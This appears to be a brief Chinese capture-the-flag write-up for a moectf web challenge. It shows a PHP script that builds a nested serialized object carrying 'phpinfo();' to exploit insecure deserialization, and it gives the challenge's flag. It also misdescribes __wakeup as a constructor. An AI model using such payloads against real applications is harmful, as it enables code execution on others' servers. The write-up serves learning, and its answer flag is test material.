跳转至

Web-18|第十八章 万卷诡阁·功法连环

📖 阅读信息

阅读时间:1 分钟 | 中文字符:67 | 有效代码行数:12

碎碎念

套娃 php 反序列化

Writeup

可以看到套了两层,真正需要调用的是 PersonB 的 work 函数,__wake_up 函数指的是函数构造函数,因此我们嵌套得到:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<?php
class PersonA {
    public $name;
}
class PersonB {
    public $name;
}

$person = new PersonA();
$person->name = new PersonB();
$person->name->name = 'phpinfo();';
echo urlencode(serialize($person));
?>

传入参数 person 得到 flag:

最终 flag:moectf{1aaa4070-587a-817b-ad13-78d669657b0e}

💬 评论

评论系统加载中...